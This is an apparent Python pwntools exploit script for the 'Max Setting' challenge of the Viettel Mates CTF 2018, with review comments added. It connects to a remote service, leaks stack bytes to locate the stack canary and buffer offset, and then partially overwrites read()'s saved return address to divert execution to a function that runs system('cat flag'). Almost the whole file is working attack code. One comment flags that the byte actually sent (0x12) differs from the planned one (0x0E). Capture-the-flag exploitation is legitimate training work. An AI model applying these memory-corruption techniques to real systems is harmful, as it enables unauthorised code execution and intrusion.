Viettel Mates CTF 2018 - Max Setting
'''
Viettel Mates CTF 2018 - Max Setting: pwntools exploit script (Python 2).
author: Nguyen Duc Manh
email: imdb95@gmail.com
'''
from pwn import * | |
import sys | |
import time | |
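# Target selection. Pass 'local' as the first CLI argument to run the binary
# from the working directory; any other value selects the remote service.
# The original indexed sys.argv[1] unconditionally and died with IndexError
# when run without arguments; fail with a usage line instead so a forgotten
# argument never silently falls through to one of the targets.
if len(sys.argv) < 2:
    sys.exit("usage: %s local|remote   (anything other than 'local' means remote)"
             % sys.argv[0])
if sys.argv[1] == 'local':
    p = process('./maxsetting')
else:
    p = remote('125.235.240.167', 4001)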
'''
Plan: overwrite the saved return address of read() so that it points at EzMoney
(0x55555555490E in the gdb session with ASLR disabled).
  + return address of read:  0xXXXXXXXXXXXXX956
  + address of EzMoney:      0xXXXXXXXXXXXXX90E
Both addresses share everything but the lowest byte, so a one-byte partial
overwrite (0x56 -> 0x0E) is enough and PIE randomisation does not matter;
EzMoney then runs system("cat flag"). Note that exploit() below actually sends
0x12 rather than 0x0E as the replacement byte.
'''
def exploit(retOffset):
    """Overwrite the saved return address and hand the session to the user.

    retOffset is the 16-bit buffer-relative index of the saved return
    address of read(); it is sent to the target as a little-endian u16.
    The function then pauses on raw_input so a debugger can be attached,
    sends the single byte that replaces the address' least significant
    byte, and switches pwntools into interactive mode.

    NOTE(review): the header comment says the low byte should become 0x0E
    (EzMoney), but this sends 0x12 -- confirm which entry into EzMoney is
    intended before reusing the script against another build.
    """
    print(hex(retOffset))
    p.send(p16(retOffset))
    # Manual breakpoint: lets the operator attach gdb before the overwrite.
    raw_input('w')
    p.send('\x12')
    p.interactive()
def leak(idx, c):
    """Send one (index, byte) pair to the target and return its raw reply.

    idx is the one-byte buffer offset the service is asked to operate on
    and c is the single byte written there. The short sleep between the
    two sends is presumably there so the service reads them as two
    separate inputs. The reply is consumed up to and including the
    "Try again?" prompt; the caller scans it for leaked stack bytes.

    Raises ValueError (from chr) when idx is outside 0..255.
    """
    p.send(chr(idx))
    time.sleep(0.1)  # keep the two writes from arriving as one read()
    p.send(c)
    reply = p.recvuntil('\nTry again?\n')
    print([reply])
    return reply
'''
Sample stack (gdb, addresses as shown with ASLR disabled):
0000| 0x7fffffffe3d8 --> 0x55555555496c (<writeANYwhere+75>: )
0008| 0x7fffffffe3e0 --> 0x7ffff7dd2620 --> 0xfbad2087
0016| 0x7fffffffe3e8 --> 0x7ffff7a7cdbd (test DWORD PTR [rbx],0x8000)
0024| 0x7fffffffe3f0 --> 0x7fffffffe3f8 --> 0x9a3d590be410e400
0032| 0x7fffffffe3f8 --> 0x9a3d590be410e400
0040| 0x7fffffffe400 --> 0x7fffffffe410 --> 0x555555554a50 (<__libc_csu_init>: push r15)
0048| 0x7fffffffe408 --> 0x555555554a3e (<main+34>: mov eax,0x0)
0056| 0x7fffffffe410 --> 0x555555554a50 (<__libc_csu_init>: push r15)
=> the stack cookie (0x9a3d590be410e400 here) can be recognised by:
   + seven random bytes and a single '\x00' (glibc keeps the canary's low byte at 0x00)
   + a stack pointer of the form 0x7fXXXXXXYYXX in the qword just below it
=> search for it with a while loop; u16(chr(i-16) + chr(YY)) is then the offset of buf.
'''
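# Walk the buffer downward, 8 bytes at a time, looking for the stack cookie.
# Each candidate is confirmed by the operator: a cookie looks like random
# bytes with a single '\x00', and the qword right below it is a 0x7f...
# stack pointer whose second byte supplies the high byte of buf's offset.
c = '\x00'
# Position of the leaked high byte inside a "You wrote: ..." reply.
PROMPT_LEN = len('You wrote: \x88')
i = 0xf8
while i > 0:
    print(hex(i))
    data = leak(i, c)
    # leak() sends the index as one byte, so the qword at i + 8 can only be
    # probed while i + 8 still fits in 0..0xff; without this guard the first
    # iteration (i == 0xf8) would call chr(0x100) and die with ValueError.
    if '\x7f' not in data and data.count('\x00') < 2 and i + 8 <= 0xff:
        i += 8
        p.send('y')
        data = leak(i, c)
        print('is it cookie (the second last)?')
        uin = raw_input('?')
        print(uin)
        if 'Y' in uin:
            t2 = ord(data[PROMPT_LEN])
            # Low byte: 16 below the pointer qword; high byte: leaked from it.
            offset = u16(chr(i - 16) + chr(t2))
            print(hex(offset))
            p.send('y')
            # Per the header comment, read()'s saved return address is the
            # target; it sits 24 bytes below buf's offset.
            exploit(offset - 24)
        i -= 8  # undo the +8 so the outer step stays 8 bytes
    i -= 8
    p.send('y')  # answer "Try again?" before the next probe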